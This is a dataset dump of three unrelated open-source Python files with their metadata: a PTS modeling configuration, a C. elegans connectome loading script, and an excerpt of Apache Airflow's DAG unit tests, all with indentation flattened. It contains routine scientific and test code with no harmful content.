SKIRT/PTS | modeling/config/expand.py | 1 | 3493 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
# Import the relevant PTS classes and modules
from pts.core.remote.host import find_host_ids
from pts.modeling.core.environment import load_modeling_environment_cwd
from pts.modeling.config.component import definition
# -----------------------------------------------------------------
# Copy the definition
definition = definition.copy()
# -----------------------------------------------------------------
# Set the modeling path
environment = load_modeling_environment_cwd()
runs = environment.fitting_runs
# -----------------------------------------------------------------
# Remote hosts
all_host_ids = find_host_ids()
has_remotes = len(all_host_ids) > 0
# -----------------------------------------------------------------
# The fitting run for which to explore the parameter space
if runs.empty: raise RuntimeError("No fitting runs are present")
elif runs.has_single: definition.add_fixed("run", "name of the fitting run", runs.single_name)
else: definition.add_required("run", "string", "name of the fitting run", choices=runs.names)
# Generation name
definition.add_required("generation", "string", "generation name")
# -----------------------------------------------------------------
# Parameters in which to expand
definition.add_required("parameters", "string_list", "parameters for which to expand the range") # choices are supposed to be the free parameters of a fitting run
definition.add_required("direction", "string_or_string_string_dictionary", "direction in which to expand") #choices=directions)
definition.add_required("npoints", "integer_or_string_integer_dictionary", "number of grid points to add")
# -----------------------------------------------------------------
# Remote or local execution
#if has_remotes: definition.add_positional_optional("remotes", "string_list", "remote hosts to use", default=environment.modeling_configuration.fitting_host_ids, choices=all_host_ids)
#else: definition.add_fixed("remotes", [])
definition.add_positional_optional("host", "host", "remote host to use")
definition.add_flag("local", "run everything locally")
# -----------------------------------------------------------------
# Options
definition.add_flag("attached", "run remote simulations in attached mode")
definition.add_flag("group", "group simulations in larger jobs")
definition.add_optional("walltime", "real", "the preferred walltime per job (for schedulers)")
# -----------------------------------------------------------------
# Update flags
definition.add_flag("update_individuals", "update the individuals table", True)
definition.add_flag("update_parameters", "update the parameters table", True)
definition.add_flag("update_info", "update the generation info", True)
definition.add_flag("update_generations", "update the generations table", True)
# -----------------------------------------------------------------
# Parallelization
definition.add_optional("parallelization", "parallelization", "parallelization scheme for the simulations")
definition.add_optional("nnodes", "positive_integer", "number of computation nodes to use for the simulations")
# -----------------------------------------------------------------
| agpl-3.0 | 8,462,161,034,693,216,000 | 44.947368 | 183 | 0.579324 | false |
unidesigner/microcircuit | microcircuit/dataset/testconnectome001.py | 1 | 1589 | """ Retrieve C.elegans connectivity from Web and parse appropriately
"""
# see data/
# http://mit.edu/lrv/www/elegans/
from scipy.io import matlab
import os.path as op
import networkx as nx
import microcircuit.constants as const
from microcircuit.connectome import Connectome
mat = matlab.loadmat(op.join(op.dirname(op.abspath(__file__)), 'data', 'ConnOrdered_040903.mat'))
['A_init_t_ordered',
'__header__',
'__globals__',
'Q_sorted',
'Neuron_ordered',
'Ag_t_ordered',
'__version__']
metadata = {'name': 'testconnectome001',
'neuronmap': {}}
for i,label in enumerate(mat['Neuron_ordered']):
metadata['neuronmap'][i+1] = {'name': label[0][0]}
gap = mat['Ag_t_ordered']
gap[94,94]=0.0
gap[106,106]=0.0
gap[216,216]=0.0
graphgap = nx.from_numpy_matrix(gap.todense(), create_using=nx.DiGraph())
graphgap = nx.relabel_nodes(graphgap, (lambda x:x+1))
for u,v,d in graphgap.edges_iter(data=True):
d[const.CONNECTOME_ELECTRICAL_SYNAPSE] = d['weight']
del d['weight']
chem=mat['A_init_t_ordered']
graphchem = nx.from_numpy_matrix(gap.todense(), create_using=nx.DiGraph())
graphchem = nx.relabel_nodes(graphchem, (lambda x:x+1))
for u,v,d in graphchem.edges_iter(data=True):
d[const.CONNECTOME_CHEMICAL_SYNAPSE] = d['weight']
del d['weight']
# TODO: problem with merge
for u,v,d in graphchem.edges_iter(data=True):
# TODO: how does it go over digraphs?
# In addtion
graphgap.add_edge(u,v, {const.CONNECTOME_CHEMICAL_SYNAPSE:d[const.CONNECTOME_CHEMICAL_SYNAPSE]})
testconnectome = Connectome(metadata=metadata['neuronmap'], graph=graphgap) | bsd-3-clause | -2,411,533,777,501,062,000 | 29.576923 | 100 | 0.696665 | false |
apache/airflow | tests/models/test_dag.py | 2 | 74100 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import io
import logging
import os
import pickle
import re
import unittest
from contextlib import redirect_stdout
from datetime import timedelta
from tempfile import NamedTemporaryFile
from typing import Optional
from unittest import mock
from unittest.mock import patch
import pendulum
import pytest
from dateutil.relativedelta import relativedelta
from freezegun import freeze_time
from parameterized import parameterized
from airflow import models, settings
from airflow.configuration import conf
from airflow.decorators import task as task_decorator
from airflow.exceptions import AirflowException, DuplicateTaskIdFound
from airflow.models import DAG, DagModel, DagRun, DagTag, TaskFail, TaskInstance as TI
from airflow.models.baseoperator import BaseOperator
from airflow.models.dag import dag as dag_decorator
from airflow.models.dagparam import DagParam
from airflow.operators.bash import BashOperator
from airflow.operators.dummy import DummyOperator
from airflow.operators.subdag import SubDagOperator
from airflow.security import permissions
from airflow.timetables.simple import NullTimetable, OnceTimetable
from airflow.utils import timezone
from airflow.utils.file import list_py_file_paths
from airflow.utils.session import create_session, provide_session
from airflow.utils.state import State
from airflow.utils.timezone import datetime as datetime_tz
from airflow.utils.types import DagRunType
from airflow.utils.weight_rule import WeightRule
from tests.models import DEFAULT_DATE
from tests.test_utils.asserts import assert_queries_count
from tests.test_utils.db import clear_db_dags, clear_db_runs
from tests.test_utils.timetables import cron_timetable, delta_timetable
TEST_DATE = datetime_tz(2015, 1, 2, 0, 0)
class TestDag(unittest.TestCase):
def setUp(self) -> None:
clear_db_runs()
clear_db_dags()
self.patcher_dag_code = patch.object(settings, "STORE_DAG_CODE", False)
self.patcher_dag_code.start()
def tearDown(self) -> None:
clear_db_runs()
clear_db_dags()
self.patcher_dag_code.stop()
@staticmethod
def _clean_up(dag_id: str):
with create_session() as session:
session.query(DagRun).filter(DagRun.dag_id == dag_id).delete(synchronize_session=False)
session.query(TI).filter(TI.dag_id == dag_id).delete(synchronize_session=False)
session.query(TaskFail).filter(TaskFail.dag_id == dag_id).delete(synchronize_session=False)
@staticmethod
def _occur_before(a, b, list_):
"""
Assert that a occurs before b in the list.
"""
a_index = -1
b_index = -1
for i, e in enumerate(list_):
if e.task_id == a:
a_index = i
if e.task_id == b:
b_index = i
return 0 <= a_index < b_index
def test_params_not_passed_is_empty_dict(self):
"""
Test that when 'params' is _not_ passed to a new Dag, that the params
attribute is set to an empty dictionary.
"""
dag = models.DAG('test-dag')
assert isinstance(dag.params, dict)
assert 0 == len(dag.params)
def test_params_passed_and_params_in_default_args_no_override(self):
"""
Test that when 'params' exists as a key passed to the default_args dict
in addition to params being passed explicitly as an argument to the
dag, that the 'params' key of the default_args dict is merged with the
dict of the params argument.
"""
params1 = {'parameter1': 1}
params2 = {'parameter2': 2}
dag = models.DAG('test-dag', default_args={'params': params1}, params=params2)
params_combined = params1.copy()
params_combined.update(params2)
assert params_combined == dag.params
def test_dag_invalid_default_view(self):
"""
Test invalid `default_view` of DAG initialization
"""
with pytest.raises(AirflowException, match='Invalid values of dag.default_view: only support'):
models.DAG(dag_id='test-invalid-default_view', default_view='airflow')
def test_dag_default_view_default_value(self):
"""
Test `default_view` default value of DAG initialization
"""
dag = models.DAG(dag_id='test-default_default_view')
assert conf.get('webserver', 'dag_default_view').lower() == dag.default_view
def test_dag_invalid_orientation(self):
"""
Test invalid `orientation` of DAG initialization
"""
with pytest.raises(AirflowException, match='Invalid values of dag.orientation: only support'):
models.DAG(dag_id='test-invalid-orientation', orientation='airflow')
def test_dag_orientation_default_value(self):
"""
Test `orientation` default value of DAG initialization
"""
dag = models.DAG(dag_id='test-default_orientation')
assert conf.get('webserver', 'dag_orientation') == dag.orientation
def test_dag_as_context_manager(self):
"""
Test DAG as a context manager.
When used as a context manager, Operators are automatically added to
the DAG (unless they specify a different DAG)
"""
dag = DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
dag2 = DAG('dag2', start_date=DEFAULT_DATE, default_args={'owner': 'owner2'})
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2', dag=dag2)
assert op1.dag is dag
assert op1.owner == 'owner1'
assert op2.dag is dag2
assert op2.owner == 'owner2'
with dag2:
op3 = DummyOperator(task_id='op3')
assert op3.dag is dag2
assert op3.owner == 'owner2'
with dag:
with dag2:
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
assert op4.dag is dag2
assert op5.dag is dag
assert op4.owner == 'owner2'
assert op5.owner == 'owner1'
with DAG('creating_dag_in_cm', start_date=DEFAULT_DATE) as dag:
DummyOperator(task_id='op6')
assert dag.dag_id == 'creating_dag_in_cm'
assert dag.tasks[0].task_id == 'op6'
with dag:
with dag:
op7 = DummyOperator(task_id='op7')
op8 = DummyOperator(task_id='op8')
op9 = DummyOperator(task_id='op8')
op9.dag = dag2
assert op7.dag == dag
assert op8.dag == dag
assert op9.dag == dag2
def test_dag_topological_sort_include_subdag_tasks(self):
child_dag = DAG(
'parent_dag.child_dag',
schedule_interval='@daily',
start_date=DEFAULT_DATE,
)
with child_dag:
DummyOperator(task_id='a_child')
DummyOperator(task_id='b_child')
parent_dag = DAG(
'parent_dag',
schedule_interval='@daily',
start_date=DEFAULT_DATE,
)
# a_parent -> child_dag -> (a_child | b_child) -> b_parent
with parent_dag:
op1 = DummyOperator(task_id='a_parent')
op2 = SubDagOperator(task_id='child_dag', subdag=child_dag)
op3 = DummyOperator(task_id='b_parent')
op1 >> op2 >> op3
topological_list = parent_dag.topological_sort(include_subdag_tasks=True)
assert self._occur_before('a_parent', 'child_dag', topological_list)
assert self._occur_before('child_dag', 'a_child', topological_list)
assert self._occur_before('child_dag', 'b_child', topological_list)
assert self._occur_before('a_child', 'b_parent', topological_list)
assert self._occur_before('b_child', 'b_parent', topological_list)
def test_dag_topological_sort1(self):
dag = DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
# A -> B
# A -> C -> D
# ordered: B, D, C, A or D, B, C, A or D, C, B, A
with dag:
op1 = DummyOperator(task_id='A')
op2 = DummyOperator(task_id='B')
op3 = DummyOperator(task_id='C')
op4 = DummyOperator(task_id='D')
op1.set_upstream([op2, op3])
op3.set_upstream(op4)
topological_list = dag.topological_sort()
logging.info(topological_list)
tasks = [op2, op3, op4]
assert topological_list[0] in tasks
tasks.remove(topological_list[0])
assert topological_list[1] in tasks
tasks.remove(topological_list[1])
assert topological_list[2] in tasks
tasks.remove(topological_list[2])
assert topological_list[3] == op1
def test_dag_topological_sort2(self):
dag = DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
# C -> (A u B) -> D
# C -> E
# ordered: E | D, A | B, C
with dag:
op1 = DummyOperator(task_id='A')
op2 = DummyOperator(task_id='B')
op3 = DummyOperator(task_id='C')
op4 = DummyOperator(task_id='D')
op5 = DummyOperator(task_id='E')
op1.set_downstream(op3)
op2.set_downstream(op3)
op1.set_upstream(op4)
op2.set_upstream(op4)
op5.set_downstream(op3)
topological_list = dag.topological_sort()
logging.info(topological_list)
set1 = [op4, op5]
assert topological_list[0] in set1
set1.remove(topological_list[0])
set2 = [op1, op2]
set2.extend(set1)
assert topological_list[1] in set2
set2.remove(topological_list[1])
assert topological_list[2] in set2
set2.remove(topological_list[2])
assert topological_list[3] in set2
assert topological_list[4] == op3
def test_dag_topological_sort_dag_without_tasks(self):
dag = DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'})
assert () == dag.topological_sort()
def test_dag_naive_start_date_string(self):
DAG('DAG', default_args={'start_date': '2019-06-01'})
def test_dag_naive_start_end_dates_strings(self):
DAG('DAG', default_args={'start_date': '2019-06-01', 'end_date': '2019-06-05'})
def test_dag_start_date_propagates_to_end_date(self):
"""
Tests that a start_date string with a timezone and an end_date string without a timezone
are accepted and that the timezone from the start carries over the end
This test is a little indirect, it works by setting start and end equal except for the
timezone and then testing for equality after the DAG construction. They'll be equal
only if the same timezone was applied to both.
An explicit check the `tzinfo` attributes for both are the same is an extra check.
"""
dag = DAG(
'DAG', default_args={'start_date': '2019-06-05T00:00:00+05:00', 'end_date': '2019-06-05T00:00:00'}
)
assert dag.default_args['start_date'] == dag.default_args['end_date']
assert dag.default_args['start_date'].tzinfo == dag.default_args['end_date'].tzinfo
def test_dag_naive_default_args_start_date(self):
dag = DAG('DAG', default_args={'start_date': datetime.datetime(2018, 1, 1)})
assert dag.timezone == settings.TIMEZONE
dag = DAG('DAG', start_date=datetime.datetime(2018, 1, 1))
assert dag.timezone == settings.TIMEZONE
def test_dag_none_default_args_start_date(self):
"""
Tests if a start_date of None in default_args
works.
"""
dag = DAG('DAG', default_args={'start_date': None})
assert dag.timezone == settings.TIMEZONE
def test_dag_task_priority_weight_total(self):
width = 5
depth = 5
weight = 5
pattern = re.compile('stage(\\d*).(\\d*)')
# Fully connected parallel tasks. i.e. every task at each parallel
# stage is dependent on every task in the previous stage.
# Default weight should be calculated using downstream descendants
with DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}) as dag:
pipeline = [
[DummyOperator(task_id=f'stage{i}.{j}', priority_weight=weight) for j in range(0, width)]
for i in range(0, depth)
]
for i, stage in enumerate(pipeline):
if i == 0:
continue
for current_task in stage:
for prev_task in pipeline[i - 1]:
current_task.set_upstream(prev_task)
for task in dag.task_dict.values():
match = pattern.match(task.task_id)
task_depth = int(match.group(1))
# the sum of each stages after this task + itself
correct_weight = ((depth - (task_depth + 1)) * width + 1) * weight
calculated_weight = task.priority_weight_total
assert calculated_weight == correct_weight
def test_dag_task_priority_weight_total_using_upstream(self):
# Same test as above except use 'upstream' for weight calculation
weight = 3
width = 5
depth = 5
pattern = re.compile('stage(\\d*).(\\d*)')
with DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}) as dag:
pipeline = [
[
DummyOperator(
task_id=f'stage{i}.{j}',
priority_weight=weight,
weight_rule=WeightRule.UPSTREAM,
)
for j in range(0, width)
]
for i in range(0, depth)
]
for i, stage in enumerate(pipeline):
if i == 0:
continue
for current_task in stage:
for prev_task in pipeline[i - 1]:
current_task.set_upstream(prev_task)
for task in dag.task_dict.values():
match = pattern.match(task.task_id)
task_depth = int(match.group(1))
# the sum of each stages after this task + itself
correct_weight = (task_depth * width + 1) * weight
calculated_weight = task.priority_weight_total
assert calculated_weight == correct_weight
def test_dag_task_priority_weight_total_using_absolute(self):
# Same test as above except use 'absolute' for weight calculation
weight = 10
width = 5
depth = 5
with DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}) as dag:
pipeline = [
[
DummyOperator(
task_id=f'stage{i}.{j}',
priority_weight=weight,
weight_rule=WeightRule.ABSOLUTE,
)
for j in range(0, width)
]
for i in range(0, depth)
]
for i, stage in enumerate(pipeline):
if i == 0:
continue
for current_task in stage:
for prev_task in pipeline[i - 1]:
current_task.set_upstream(prev_task)
for task in dag.task_dict.values():
# the sum of each stages after this task + itself
correct_weight = weight
calculated_weight = task.priority_weight_total
assert calculated_weight == correct_weight
def test_dag_task_invalid_weight_rule(self):
# Test if we enter an invalid weight rule
with DAG('dag', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}):
with pytest.raises(AirflowException):
DummyOperator(task_id='should_fail', weight_rule='no rule')
def test_get_num_task_instances(self):
test_dag_id = 'test_get_num_task_instances_dag'
test_task_id = 'task_1'
test_dag = DAG(dag_id=test_dag_id, start_date=DEFAULT_DATE)
test_task = DummyOperator(task_id=test_task_id, dag=test_dag)
ti1 = TI(task=test_task, execution_date=DEFAULT_DATE)
ti1.state = None
ti2 = TI(task=test_task, execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti2.state = State.RUNNING
ti3 = TI(task=test_task, execution_date=DEFAULT_DATE + datetime.timedelta(days=2))
ti3.state = State.QUEUED
ti4 = TI(task=test_task, execution_date=DEFAULT_DATE + datetime.timedelta(days=3))
ti4.state = State.RUNNING
session = settings.Session()
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.merge(ti4)
session.commit()
assert 0 == DAG.get_num_task_instances(test_dag_id, ['fakename'], session=session)
assert 4 == DAG.get_num_task_instances(test_dag_id, [test_task_id], session=session)
assert 4 == DAG.get_num_task_instances(test_dag_id, ['fakename', test_task_id], session=session)
assert 1 == DAG.get_num_task_instances(test_dag_id, [test_task_id], states=[None], session=session)
assert 2 == DAG.get_num_task_instances(
test_dag_id, [test_task_id], states=[State.RUNNING], session=session
)
assert 3 == DAG.get_num_task_instances(
test_dag_id, [test_task_id], states=[None, State.RUNNING], session=session
)
assert 4 == DAG.get_num_task_instances(
test_dag_id, [test_task_id], states=[None, State.QUEUED, State.RUNNING], session=session
)
session.close()
def test_user_defined_filters(self):
def jinja_udf(name):
return f'Hello {name}'
dag = models.DAG('test-dag', start_date=DEFAULT_DATE, user_defined_filters={"hello": jinja_udf})
jinja_env = dag.get_template_env()
assert 'hello' in jinja_env.filters
assert jinja_env.filters['hello'] == jinja_udf
def test_resolve_template_files_value(self):
with NamedTemporaryFile(suffix='.template') as f:
f.write(b'{{ ds }}')
f.flush()
template_dir = os.path.dirname(f.name)
template_file = os.path.basename(f.name)
with DAG('test-dag', start_date=DEFAULT_DATE, template_searchpath=template_dir):
task = DummyOperator(task_id='op1')
task.test_field = template_file
task.template_fields = ('test_field',)
task.template_ext = ('.template',)
task.resolve_template_files()
assert task.test_field == '{{ ds }}'
def test_resolve_template_files_list(self):
with NamedTemporaryFile(suffix='.template') as f:
f.write(b'{{ ds }}')
f.flush()
template_dir = os.path.dirname(f.name)
template_file = os.path.basename(f.name)
with DAG('test-dag', start_date=DEFAULT_DATE, template_searchpath=template_dir):
task = DummyOperator(task_id='op1')
task.test_field = [template_file, 'some_string']
task.template_fields = ('test_field',)
task.template_ext = ('.template',)
task.resolve_template_files()
assert task.test_field == ['{{ ds }}', 'some_string']
def test_following_previous_schedule(self):
"""
Make sure DST transitions are properly observed
"""
local_tz = pendulum.timezone('Europe/Zurich')
start = local_tz.convert(datetime.datetime(2018, 10, 28, 2, 55), dst_rule=pendulum.PRE_TRANSITION)
assert start.isoformat() == "2018-10-28T02:55:00+02:00", "Pre-condition: start date is in DST"
utc = timezone.convert_to_utc(start)
dag = DAG('tz_dag', start_date=start, schedule_interval='*/5 * * * *')
_next = dag.following_schedule(utc)
next_local = local_tz.convert(_next)
assert _next.isoformat() == "2018-10-28T01:00:00+00:00"
assert next_local.isoformat() == "2018-10-28T02:00:00+01:00"
prev = dag.previous_schedule(utc)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-10-28T02:50:00+02:00"
prev = dag.previous_schedule(_next)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-10-28T02:55:00+02:00"
assert prev == utc
def test_following_previous_schedule_daily_dag_cest_to_cet(self):
"""
Make sure DST transitions are properly observed
"""
local_tz = pendulum.timezone('Europe/Zurich')
start = local_tz.convert(datetime.datetime(2018, 10, 27, 3), dst_rule=pendulum.PRE_TRANSITION)
utc = timezone.convert_to_utc(start)
dag = DAG('tz_dag', start_date=start, schedule_interval='0 3 * * *')
prev = dag.previous_schedule(utc)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-10-26T03:00:00+02:00"
assert prev.isoformat() == "2018-10-26T01:00:00+00:00"
_next = dag.following_schedule(utc)
next_local = local_tz.convert(_next)
assert next_local.isoformat() == "2018-10-28T03:00:00+01:00"
assert _next.isoformat() == "2018-10-28T02:00:00+00:00"
prev = dag.previous_schedule(_next)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-10-27T03:00:00+02:00"
assert prev.isoformat() == "2018-10-27T01:00:00+00:00"
def test_following_previous_schedule_daily_dag_cet_to_cest(self):
"""
Make sure DST transitions are properly observed
"""
local_tz = pendulum.timezone('Europe/Zurich')
start = local_tz.convert(datetime.datetime(2018, 3, 25, 2), dst_rule=pendulum.PRE_TRANSITION)
utc = timezone.convert_to_utc(start)
dag = DAG('tz_dag', start_date=start, schedule_interval='0 3 * * *')
prev = dag.previous_schedule(utc)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-03-24T03:00:00+01:00"
assert prev.isoformat() == "2018-03-24T02:00:00+00:00"
_next = dag.following_schedule(utc)
next_local = local_tz.convert(_next)
assert next_local.isoformat() == "2018-03-25T03:00:00+02:00"
assert _next.isoformat() == "2018-03-25T01:00:00+00:00"
prev = dag.previous_schedule(_next)
prev_local = local_tz.convert(prev)
assert prev_local.isoformat() == "2018-03-24T03:00:00+01:00"
assert prev.isoformat() == "2018-03-24T02:00:00+00:00"
def test_following_schedule_relativedelta(self):
"""
Tests following_schedule a dag with a relativedelta schedule_interval
"""
dag_id = "test_schedule_dag_relativedelta"
delta = relativedelta(hours=+1)
dag = DAG(dag_id=dag_id, schedule_interval=delta)
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=TEST_DATE))
_next = dag.following_schedule(TEST_DATE)
assert _next.isoformat() == "2015-01-02T01:00:00+00:00"
_next = dag.following_schedule(_next)
assert _next.isoformat() == "2015-01-02T02:00:00+00:00"
def test_previous_schedule_datetime_timezone(self):
# Check that we don't get an AttributeError 'name' for self.timezone
start = datetime.datetime(2018, 3, 25, 2, tzinfo=datetime.timezone.utc)
dag = DAG('tz_dag', start_date=start, schedule_interval='@hourly')
when = dag.previous_schedule(start)
assert when.isoformat() == "2018-03-25T01:00:00+00:00"
def test_following_schedule_datetime_timezone(self):
# Check that we don't get an AttributeError 'name' for self.timezone
start = datetime.datetime(2018, 3, 25, 2, tzinfo=datetime.timezone.utc)
dag = DAG('tz_dag', start_date=start, schedule_interval='@hourly')
when = dag.following_schedule(start)
assert when.isoformat() == "2018-03-25T03:00:00+00:00"
def test_following_schedule_datetime_timezone_utc0530(self):
# Check that we don't get an AttributeError 'name' for self.timezone
class UTC0530(datetime.tzinfo):
"""tzinfo derived concrete class named "+0530" with offset of 19800"""
# can be configured here
_offset = datetime.timedelta(seconds=19800)
_dst = datetime.timedelta(0)
_name = "+0530"
def utcoffset(self, dt):
return self.__class__._offset
def dst(self, dt):
return self.__class__._dst
def tzname(self, dt):
return self.__class__._name
start = datetime.datetime(2018, 3, 25, 10, tzinfo=UTC0530())
dag = DAG('tz_dag', start_date=start, schedule_interval='@hourly')
when = dag.following_schedule(start)
assert when.isoformat() == "2018-03-25T05:30:00+00:00"
def test_dagtag_repr(self):
clear_db_dags()
dag = DAG('dag-test-dagtag', start_date=DEFAULT_DATE, tags=['tag-1', 'tag-2'])
dag.sync_to_db()
with create_session() as session:
assert {'tag-1', 'tag-2'} == {
repr(t) for t in session.query(DagTag).filter(DagTag.dag_id == 'dag-test-dagtag').all()
}
def test_bulk_write_to_db(self):
clear_db_dags()
dags = [DAG(f'dag-bulk-sync-{i}', start_date=DEFAULT_DATE, tags=["test-dag"]) for i in range(0, 4)]
with assert_queries_count(5):
DAG.bulk_write_to_db(dags)
with create_session() as session:
assert {'dag-bulk-sync-0', 'dag-bulk-sync-1', 'dag-bulk-sync-2', 'dag-bulk-sync-3'} == {
row[0] for row in session.query(DagModel.dag_id).all()
}
assert {
('dag-bulk-sync-0', 'test-dag'),
('dag-bulk-sync-1', 'test-dag'),
('dag-bulk-sync-2', 'test-dag'),
('dag-bulk-sync-3', 'test-dag'),
} == set(session.query(DagTag.dag_id, DagTag.name).all())
for row in session.query(DagModel.last_parsed_time).all():
assert row[0] is not None
# Re-sync should do fewer queries
with assert_queries_count(4):
DAG.bulk_write_to_db(dags)
with assert_queries_count(4):
DAG.bulk_write_to_db(dags)
# Adding tags
for dag in dags:
dag.tags.append("test-dag2")
with assert_queries_count(5):
DAG.bulk_write_to_db(dags)
with create_session() as session:
assert {'dag-bulk-sync-0', 'dag-bulk-sync-1', 'dag-bulk-sync-2', 'dag-bulk-sync-3'} == {
row[0] for row in session.query(DagModel.dag_id).all()
}
assert {
('dag-bulk-sync-0', 'test-dag'),
('dag-bulk-sync-0', 'test-dag2'),
('dag-bulk-sync-1', 'test-dag'),
('dag-bulk-sync-1', 'test-dag2'),
('dag-bulk-sync-2', 'test-dag'),
('dag-bulk-sync-2', 'test-dag2'),
('dag-bulk-sync-3', 'test-dag'),
('dag-bulk-sync-3', 'test-dag2'),
} == set(session.query(DagTag.dag_id, DagTag.name).all())
# Removing tags
for dag in dags:
dag.tags.remove("test-dag")
with assert_queries_count(5):
DAG.bulk_write_to_db(dags)
with create_session() as session:
assert {'dag-bulk-sync-0', 'dag-bulk-sync-1', 'dag-bulk-sync-2', 'dag-bulk-sync-3'} == {
row[0] for row in session.query(DagModel.dag_id).all()
}
assert {
('dag-bulk-sync-0', 'test-dag2'),
('dag-bulk-sync-1', 'test-dag2'),
('dag-bulk-sync-2', 'test-dag2'),
('dag-bulk-sync-3', 'test-dag2'),
} == set(session.query(DagTag.dag_id, DagTag.name).all())
for row in session.query(DagModel.last_parsed_time).all():
assert row[0] is not None
def test_bulk_write_to_db_max_active_runs(self):
"""
Test that DagModel.next_dagrun_create_after is set to NULL when the dag cannot be created due to max
active runs being hit.
"""
dag = DAG(dag_id='test_scheduler_verify_max_active_runs', start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(task_id='dummy', dag=dag, owner='airflow')
session = settings.Session()
dag.clear()
DAG.bulk_write_to_db([dag], session)
model = session.query(DagModel).get((dag.dag_id,))
period_end = dag.following_schedule(DEFAULT_DATE)
assert model.next_dagrun == DEFAULT_DATE
assert model.next_dagrun_create_after == period_end
dr = dag.create_dagrun(
state=State.RUNNING,
execution_date=model.next_dagrun,
run_type=DagRunType.SCHEDULED,
session=session,
)
assert dr is not None
DAG.bulk_write_to_db([dag])
model = session.query(DagModel).get((dag.dag_id,))
assert model.next_dagrun == period_end
# We signal "at max active runs" by saying this run is never eligible to be created
assert model.next_dagrun_create_after is None
def test_sync_to_db(self):
dag = DAG(
'dag',
start_date=DEFAULT_DATE,
)
with dag:
DummyOperator(task_id='task', owner='owner1')
subdag = DAG(
'dag.subtask',
start_date=DEFAULT_DATE,
)
# parent_dag and is_subdag was set by DagBag. We don't use DagBag, so this value is not set.
subdag.parent_dag = dag
subdag.is_subdag = True
SubDagOperator(task_id='subtask', owner='owner2', subdag=subdag)
session = settings.Session()
dag.sync_to_db(session=session)
orm_dag = session.query(DagModel).filter(DagModel.dag_id == 'dag').one()
assert set(orm_dag.owners.split(', ')) == {'owner1', 'owner2'}
assert orm_dag.is_active
assert orm_dag.default_view is not None
assert orm_dag.default_view == conf.get('webserver', 'dag_default_view').lower()
assert orm_dag.safe_dag_id == 'dag'
orm_subdag = session.query(DagModel).filter(DagModel.dag_id == 'dag.subtask').one()
assert set(orm_subdag.owners.split(', ')) == {'owner1', 'owner2'}
assert orm_subdag.is_active
assert orm_subdag.safe_dag_id == 'dag__dot__subtask'
assert orm_subdag.fileloc == orm_dag.fileloc
session.close()
def test_sync_to_db_default_view(self):
dag = DAG(
'dag',
start_date=DEFAULT_DATE,
default_view="graph",
)
with dag:
DummyOperator(task_id='task', owner='owner1')
SubDagOperator(
task_id='subtask',
owner='owner2',
subdag=DAG(
'dag.subtask',
start_date=DEFAULT_DATE,
),
)
session = settings.Session()
dag.sync_to_db(session=session)
orm_dag = session.query(DagModel).filter(DagModel.dag_id == 'dag').one()
assert orm_dag.default_view is not None
assert orm_dag.default_view == "graph"
session.close()
@provide_session
def test_is_paused_subdag(self, session):
subdag_id = 'dag.subdag'
subdag = DAG(
subdag_id,
start_date=DEFAULT_DATE,
)
with subdag:
DummyOperator(
task_id='dummy_task',
)
dag_id = 'dag'
dag = DAG(
dag_id,
start_date=DEFAULT_DATE,
)
with dag:
SubDagOperator(task_id='subdag', subdag=subdag)
# parent_dag and is_subdag was set by DagBag. We don't use DagBag, so this value is not set.
subdag.parent_dag = dag
subdag.is_subdag = True
session.query(DagModel).filter(DagModel.dag_id.in_([subdag_id, dag_id])).delete(
synchronize_session=False
)
dag.sync_to_db(session=session)
unpaused_dags = (
session.query(DagModel.dag_id, DagModel.is_paused)
.filter(
DagModel.dag_id.in_([subdag_id, dag_id]),
)
.all()
)
assert {
(dag_id, False),
(subdag_id, False),
} == set(unpaused_dags)
DagModel.get_dagmodel(dag.dag_id).set_is_paused(is_paused=True, including_subdags=False)
paused_dags = (
session.query(DagModel.dag_id, DagModel.is_paused)
.filter(
DagModel.dag_id.in_([subdag_id, dag_id]),
)
.all()
)
assert {
(dag_id, True),
(subdag_id, False),
} == set(paused_dags)
DagModel.get_dagmodel(dag.dag_id).set_is_paused(is_paused=True)
paused_dags = (
session.query(DagModel.dag_id, DagModel.is_paused)
.filter(
DagModel.dag_id.in_([subdag_id, dag_id]),
)
.all()
)
assert {
(dag_id, True),
(subdag_id, True),
} == set(paused_dags)
def test_existing_dag_is_paused_upon_creation(self):
dag = DAG('dag_paused')
dag.sync_to_db()
assert not dag.get_is_paused()
dag = DAG('dag_paused', is_paused_upon_creation=True)
dag.sync_to_db()
# Since the dag existed before, it should not follow the pause flag upon creation
assert not dag.get_is_paused()
def test_new_dag_is_paused_upon_creation(self):
dag = DAG('new_nonexisting_dag', is_paused_upon_creation=True)
session = settings.Session()
dag.sync_to_db(session=session)
